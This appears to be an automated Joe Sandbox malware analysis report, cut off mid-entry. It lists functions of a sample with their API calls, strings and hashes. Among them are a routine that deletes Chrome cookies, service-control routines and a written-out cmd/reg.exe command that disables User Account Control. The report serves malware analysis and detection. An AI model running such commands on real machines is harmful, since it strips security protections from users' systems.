                                                                                          • Opcode ID: 2710e71acfe910868fa7bd05cf86435756edf937fb7501142c457778cac90120
                                                                                          • Instruction ID: 9e227284a7a69f00510d3be81dd7cde1580ac9a58a9ca8fbd928e09bf644cbd9
                                                                                          • Opcode Fuzzy Hash: 2710e71acfe910868fa7bd05cf86435756edf937fb7501142c457778cac90120
                                                                                          • Instruction Fuzzy Hash: CF21B170A4020556CB00FBE2CC97DEE7368AF51348F80013FB901772D2EB795A45C6DA
                                                                                          Function 00453D2D Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a9bccf30988101774ee440fa5cc9a08b358316fbf5677ac8bfda6d7ead677197
                                                                                          • Instruction ID: 106e2cecea33a690a52cc41c1271e31c3df1f85e8271d36c5dacef07d135bc52
                                                                                          • Opcode Fuzzy Hash: a9bccf30988101774ee440fa5cc9a08b358316fbf5677ac8bfda6d7ead677197
                                                                                          • Instruction Fuzzy Hash: 2C113232504214BBCB213F769C0596B7B7CDF857A7F11062BFC1583292DA38C9089269
                                                                                          Function 0044E0DA Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 0044DE21: _free.LIBCMT ref: 0044DE4A
                                                                                          • _free.LIBCMT ref: 0044E128
                                                                                            • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                                                                            • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                                                                          • _free.LIBCMT ref: 0044E133
                                                                                          • _free.LIBCMT ref: 0044E13E
                                                                                          • _free.LIBCMT ref: 0044E192
                                                                                          • _free.LIBCMT ref: 0044E19D
                                                                                          • _free.LIBCMT ref: 0044E1A8
                                                                                          • _free.LIBCMT ref: 0044E1B3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                          • String ID:
                                                                                          • API String ID: 776569668-0
                                                                                          • Opcode ID: d645742a9f031bfd4c53cfe37fe00a001808073c56fe889b6c8b285726f20831
                                                                                          • Instruction ID: b65b67035ea7ffc6fe2c1778d32cb4f6cbb79ca162155871331ff7aa41bb66fd
                                                                                          • Opcode Fuzzy Hash: d645742a9f031bfd4c53cfe37fe00a001808073c56fe889b6c8b285726f20831
                                                                                          • Instruction Fuzzy Hash: 64111571940B08AAE520BFF2CC47FCBB7DC9F14708F50882EB29D6A552DA7DB6044654
                                                                                          Function 004192AE Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00419F23: GetCurrentProcess.KERNEL32(?,?,?,0040C663,WinDir,00000000,00000000), ref: 00419F34
                                                                                            • Part of subcall function 00411F91: RegOpenKeyExA.ADVAPI32(80000002,00000400,00000000,00020019,?), ref: 00411FB5
                                                                                            • Part of subcall function 00411F91: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 00411FD2
                                                                                            • Part of subcall function 00411F91: RegCloseKey.ADVAPI32(?), ref: 00411FDD
                                                                                          • StrToIntA.SHLWAPI(00000000,00469710,00000000,00000000,00000000,00471FFC,00000001,?,?,?,?,?,?,0040D6A0), ref: 00419327
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseCurrentOpenProcessQueryValue
                                                                                          • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                          • API String ID: 1866151309-2070987746
                                                                                          • Opcode ID: 905e145e97e877e89bffcd847be86f3e5d4b8ef02cc69856730a9e086f165d02
                                                                                          • Instruction ID: a9b62d1d1389f8d2b696bc63f2982e792167bed2dd8bed00043a633dd184e9c5
                                                                                          • Opcode Fuzzy Hash: 905e145e97e877e89bffcd847be86f3e5d4b8ef02cc69856730a9e086f165d02
                                                                                          • Instruction Fuzzy Hash: E411E371A002456AC704B765CC67AAF761D8B54309F64053FF905A71E2FABC4D8282AA
                                                                                          Function 004380FA Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetLastError.KERNEL32(?,?,004380F1,0043705E), ref: 00438108
                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00438116
                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043812F
                                                                                          • SetLastError.KERNEL32(00000000,?,004380F1,0043705E), ref: 00438181
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorLastValue___vcrt_
                                                                                          • String ID:
                                                                                          • API String ID: 3852720340-0
                                                                                          • Opcode ID: 8fa3eba41d5dfcfa025b4cdbc1becdc984892f6557d94f52d480fd9577c81c63
                                                                                          • Instruction ID: 5a832d73688d02476ca7511e273f3515cfb573674d76dbd3fe9934521fa1a72b
                                                                                          • Opcode Fuzzy Hash: 8fa3eba41d5dfcfa025b4cdbc1becdc984892f6557d94f52d480fd9577c81c63
                                                                                          • Instruction Fuzzy Hash: F101283210C3326EAA102F767C85A1BAA94EB09779F31633FF214951E1FFA99C02550C
                                                                                          Function 0040A9E2 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040AA1E
                                                                                          • GetLastError.KERNEL32 ref: 0040AA28
                                                                                          Strings
                                                                                          • UserProfile, xrefs: 0040A9EE
                                                                                          • [Chrome Cookies found, cleared!], xrefs: 0040AA4E
                                                                                          • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040A9E9
                                                                                          • [Chrome Cookies not found], xrefs: 0040AA42
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: DeleteErrorFileLast
                                                                                          • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                                          • API String ID: 2018770650-304995407
                                                                                          • Opcode ID: b4927beb3b7d8682d6e8687247d88e98b96e581d4f5d1102126ce03b4be6211c
                                                                                          • Instruction ID: 1f34f6daae66b163f55af04f15e1d0b60933b3567ae099988c08ef58cbd90c9e
                                                                                          • Opcode Fuzzy Hash: b4927beb3b7d8682d6e8687247d88e98b96e581d4f5d1102126ce03b4be6211c
                                                                                          • Instruction Fuzzy Hash: 0E01F731B4020467C6047A75DD278AE77249951304B50057FF402773D2FD798915CA9F
                                                                                          Function 0043887C Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __allrem.LIBCMT ref: 00438A09
                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00438A25
                                                                                          • __allrem.LIBCMT ref: 00438A3C
                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00438A5A
                                                                                          • __allrem.LIBCMT ref: 00438A71
                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00438A8F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                          • String ID:
                                                                                          • API String ID: 1992179935-0
                                                                                          • Opcode ID: a5bb698a37765ca5ad947defe33ca2ea1dc364bfd829a3e03f22b831f39bfe5b
                                                                                          • Instruction ID: 1db505a437643d25cad1e1ab06004ebe691486694b679651004c0d70fbe8f9c1
                                                                                          • Opcode Fuzzy Hash: a5bb698a37765ca5ad947defe33ca2ea1dc364bfd829a3e03f22b831f39bfe5b
                                                                                          • Instruction Fuzzy Hash: CD815972A007069BE724BA29CC41B6BF3E8AF49328F14512FF511D6382EF78D900875D
                                                                                          Function 00442E0B Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: __cftoe
                                                                                          • String ID:
                                                                                          • API String ID: 4189289331-0
                                                                                          • Opcode ID: 0fae115f831cac106012114eb4540e124d695819a26846d31b7a5b9ad28ad3e8
                                                                                          • Instruction ID: 4563a9c63fae0d6d7f7aa9a83d474a3ec136fb2d14012502de5dff0b8c27d610
                                                                                          • Opcode Fuzzy Hash: 0fae115f831cac106012114eb4540e124d695819a26846d31b7a5b9ad28ad3e8
                                                                                          • Instruction Fuzzy Hash: CB510C32500205ABFB209F598E45EAF77B8EF48334FE0421FF415D6282EB79D941966C
                                                                                          Function 00444A81 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: __freea$__alloca_probe_16_free
                                                                                          • String ID: a/p$am/pm
                                                                                          • API String ID: 2936374016-3206640213
                                                                                          • Opcode ID: 5bf20948ecfdcfc47f5d03c18463ec118060d09d36ce90c1cff5387842e26ce9
                                                                                          • Instruction ID: 5910b70c00eb86a61931efff1dda8232d7c1eee9eff2524394b85f82b3a3e216
                                                                                          • Opcode Fuzzy Hash: 5bf20948ecfdcfc47f5d03c18463ec118060d09d36ce90c1cff5387842e26ce9
                                                                                          • Instruction Fuzzy Hash: 05D1E171900206CAFB289F68C895BBBB7B1FF85300F29415BE905AB391D73D9D81CB59
                                                                                          Function 0040F8B7 Relevance: 9.1, APIs: 6, Instructions: 75COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 0040F8C4
                                                                                          • int.LIBCPMT ref: 0040F8D7
                                                                                            • Part of subcall function 0040CAE9: std::_Lockit::_Lockit.LIBCPMT ref: 0040CAFA
                                                                                            • Part of subcall function 0040CAE9: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CB14
                                                                                          • std::_Facet_Register.LIBCPMT ref: 0040F917
                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 0040F920
                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040F93E
                                                                                          • __Init_thread_footer.LIBCMT ref: 0040F97F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                                                                          • String ID:
                                                                                          • API String ID: 3815856325-0
                                                                                          • Opcode ID: 296aa1fc45bd8a97e11338d30c2ad026eda8063a32206ad78c4166fd1b77079b
                                                                                          • Instruction ID: 3bb9722abb9e04fd13c8d4025e7ce1c878c76566b3017ce531706a3e1b7c3414
                                                                                          • Opcode Fuzzy Hash: 296aa1fc45bd8a97e11338d30c2ad026eda8063a32206ad78c4166fd1b77079b
                                                                                          • Instruction Fuzzy Hash: 90212232900104EBCB24EBA9E94699E7378AB08324F20017FF844B72D1DB389F458BD9
                                                                                          Function 00418C2E Relevance: 9.1, APIs: 6, Instructions: 67serviceCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,00418344,00000000), ref: 00418C3E
                                                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,00418344,00000000), ref: 00418C52
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00418344,00000000), ref: 00418C5F
                                                                                          • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00418344,00000000), ref: 00418C94
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00418344,00000000), ref: 00418CA6
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00418344,00000000), ref: 00418CA9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                                          • String ID:
                                                                                          • API String ID: 493672254-0
                                                                                          • Opcode ID: 6b3aada76383092df42fd9d8378ae16ca6440a91692c2fe76f90724c69c65514
                                                                                          • Instruction ID: 151ede47f5a01f66990efdacd58a0b59027112db6305451f0336687f4909308b
                                                                                          • Opcode Fuzzy Hash: 6b3aada76383092df42fd9d8378ae16ca6440a91692c2fe76f90724c69c65514
                                                                                          • Instruction Fuzzy Hash: A20149711862183AE6108B389C4EEBB3A6CDB42771F14032FF925A32D1EE68CD4185F9
                                                                                          Function 00445725 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                                                                                          • _free.LIBCMT ref: 0044575C
                                                                                          • _free.LIBCMT ref: 00445784
                                                                                          • SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 00445791
                                                                                          • SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                                                                                          • _abort.LIBCMT ref: 004457A3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$_free$_abort
                                                                                          • String ID:
                                                                                          • API String ID: 3160817290-0
                                                                                          • Opcode ID: 2164e89f114e7cf86b97a0d05c6cee2e89ce7be6ffa074a4cf04242e0fee9013
                                                                                          • Instruction ID: 2afc6a99b93033dbed13f8def56e2284daf42193b39b630cfab03248b002a5f8
                                                                                          • Opcode Fuzzy Hash: 2164e89f114e7cf86b97a0d05c6cee2e89ce7be6ffa074a4cf04242e0fee9013
                                                                                          • Instruction Fuzzy Hash: 6EF0FE35100F0067FA117B367C8AB2F1A695FC2B2AF21013BF419D6293EE3DC902452D
                                                                                          Function 00418A5C Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,004185D9,00000000), ref: 00418A6B
                                                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,004185D9,00000000), ref: 00418A7F
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004185D9,00000000), ref: 00418A8C
                                                                                          • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004185D9,00000000), ref: 00418A9B
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004185D9,00000000), ref: 00418AAD
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004185D9,00000000), ref: 00418AB0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Service$CloseHandle$Open$ControlManager
                                                                                          • String ID:
                                                                                          • API String ID: 221034970-0
                                                                                          • Opcode ID: f9d93c7612eed7e1ddf8c3953865d04e5265de3587757247bbfd6a1c47877660
                                                                                          • Instruction ID: 4afe7732e2fa81f36ccf108e41ed7890102f29a09d0e479adccf976045b68e04
                                                                                          • Opcode Fuzzy Hash: f9d93c7612eed7e1ddf8c3953865d04e5265de3587757247bbfd6a1c47877660
                                                                                          • Instruction Fuzzy Hash: A4F0C2315013186BD210EBA5DC89EBF3BACDF45B96B41002BFD0993192DF38CD4689E9
                                                                                          Function 00418B60 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,00418559,00000000), ref: 00418B6F
                                                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00418559,00000000), ref: 00418B83
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00418559,00000000), ref: 00418B90
                                                                                          • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00418559,00000000), ref: 00418B9F
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00418559,00000000), ref: 00418BB1
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00418559,00000000), ref: 00418BB4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Service$CloseHandle$Open$ControlManager
                                                                                          • String ID:
                                                                                          • API String ID: 221034970-0
                                                                                          • Opcode ID: 027b45ec19db43cd3e6d09ceb5389eefa79acdbdadc7d59ed190380558829436
                                                                                          • Instruction ID: 20460b91a854b5e3c53015269073f2e928c2deccd9acf6b4d89527a320d4dccf
                                                                                          • Opcode Fuzzy Hash: 027b45ec19db43cd3e6d09ceb5389eefa79acdbdadc7d59ed190380558829436
                                                                                          • Instruction Fuzzy Hash: 22F0C2715402186BD210EB65DC89EBF3BACDB45B52B81006AFE09A3192DE38DD4589E9
                                                                                          Function 00418BC7 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,004184D9,00000000), ref: 00418BD6
                                                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,004184D9,00000000), ref: 00418BEA
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004184D9,00000000), ref: 00418BF7
                                                                                          • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,004184D9,00000000), ref: 00418C06
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004184D9,00000000), ref: 00418C18
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004184D9,00000000), ref: 00418C1B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Service$CloseHandle$Open$ControlManager
                                                                                          • String ID:
                                                                                          • API String ID: 221034970-0
                                                                                          • Opcode ID: 60f77fd359bc8166b0f1f63c621f75235c8633bea2de10f026708dad38e6f72c
                                                                                          • Instruction ID: 1da220ff3ffe1d32b0df5c47a21bcd1adf2661b27de4fa42f8fed5365a22baa8
                                                                                          • Opcode Fuzzy Hash: 60f77fd359bc8166b0f1f63c621f75235c8633bea2de10f026708dad38e6f72c
                                                                                          • Instruction Fuzzy Hash: 32F0C2715012186BD210EB65EC89DBF3BACDB45B51B41002AFE0993192DF38CD4589F9
                                                                                          Function 0040966D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409745), ref: 004096A3
                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409745), ref: 004096B2
                                                                                          • Sleep.KERNEL32(00002710,?,?,?,00409745), ref: 004096DF
                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,00409745), ref: 004096E6
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: File$CloseCreateHandleSizeSleep
                                                                                          • String ID: h G
                                                                                          • API String ID: 1958988193-3300504347
                                                                                          • Opcode ID: 2165585e5b18e3410dae2497746dd606356f3a02818af73040aae92c32689789
                                                                                          • Instruction ID: 1483d32ec36d41576822df3093d1b75ffc22edec2a146082987510034e162158
                                                                                          • Opcode Fuzzy Hash: 2165585e5b18e3410dae2497746dd606356f3a02818af73040aae92c32689789
                                                                                          • Instruction Fuzzy Hash: 24113D70201380ABD7316B749D99A2F3A9BB746304F44087EF281636D3C67D5C44C32E
                                                                                          Function 0041B2C4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RegisterClassExA.USER32(00000030), ref: 0041B310
                                                                                          • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041B32B
                                                                                          • GetLastError.KERNEL32 ref: 0041B335
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ClassCreateErrorLastRegisterWindow
                                                                                          • String ID: 0$MsgWindowClass
                                                                                          • API String ID: 2877667751-2410386613
                                                                                          • Opcode ID: 5c8849b15fa1cc9467c1d7fb15406a30d7545ffe8e7388a5e40320623bb372a5
                                                                                          • Instruction ID: 33db8f89e50e9671cec9701a72200cc03bcb20702a276687bfdd99081a41ce18
                                                                                          • Opcode Fuzzy Hash: 5c8849b15fa1cc9467c1d7fb15406a30d7545ffe8e7388a5e40320623bb372a5
                                                                                          • Instruction Fuzzy Hash: 1F0125B190031CABDB10DFE5EC849EFBBBCFB08355F40052AF810A2250E77599048AA4
                                                                                          Function 00437603 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • ___BuildCatchObject.LIBVCRUNTIME ref: 0043761A
                                                                                            • Part of subcall function 00437C52: ___AdjustPointer.LIBCMT ref: 00437C9C
                                                                                          • _UnwindNestedFrames.LIBCMT ref: 00437631
                                                                                          • ___FrameUnwindToState.LIBVCRUNTIME ref: 00437643
                                                                                          • CallCatchBlock.LIBVCRUNTIME ref: 00437667
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                                          • String ID: /zC
                                                                                          • API String ID: 2633735394-4132788633
                                                                                          • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                                          • Instruction ID: d669bc69f5b2d8c9fbf55978af89ff33433ac2085b506f133949dc977f569c90
                                                                                          • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                                          • Instruction Fuzzy Hash: 44012D72004508BBCF225F56CC42EDA3BBAEF4C764F15501AFA9861220C33AE861DF98
                                                                                          Function 0041739D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetSystemMetrics.USER32(0000004C), ref: 004173AA
                                                                                          • GetSystemMetrics.USER32(0000004D), ref: 004173B0
                                                                                          • GetSystemMetrics.USER32(0000004E), ref: 004173B6
                                                                                          • GetSystemMetrics.USER32(0000004F), ref: 004173BC
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: MetricsSystem
                                                                                          • String ID: ]tA
                                                                                          • API String ID: 4116985748-3517819141
                                                                                          • Opcode ID: 812a9219b2c6697e1b7e6c0967c7113de32af3875f372bd592213eda7148f6bd
                                                                                          • Instruction ID: 3cbdadbf3de93f5eefc1923f71e525f4be7d9c38d0567e5d5edaddbebabc810f
                                                                                          • Opcode Fuzzy Hash: 812a9219b2c6697e1b7e6c0967c7113de32af3875f372bd592213eda7148f6bd
                                                                                          • Instruction Fuzzy Hash: 64F0AFB1B043254BD700EA7A8C41A6FAAE59BD4274F11443FFA09C7282EEB8DC458B94
                                                                                          Function 0040E501 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43processCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?,?,?,00000000,00471FFC), ref: 0040E547
                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,00000000,00471FFC), ref: 0040E556
                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,00000000,00471FFC), ref: 0040E55B
                                                                                          Strings
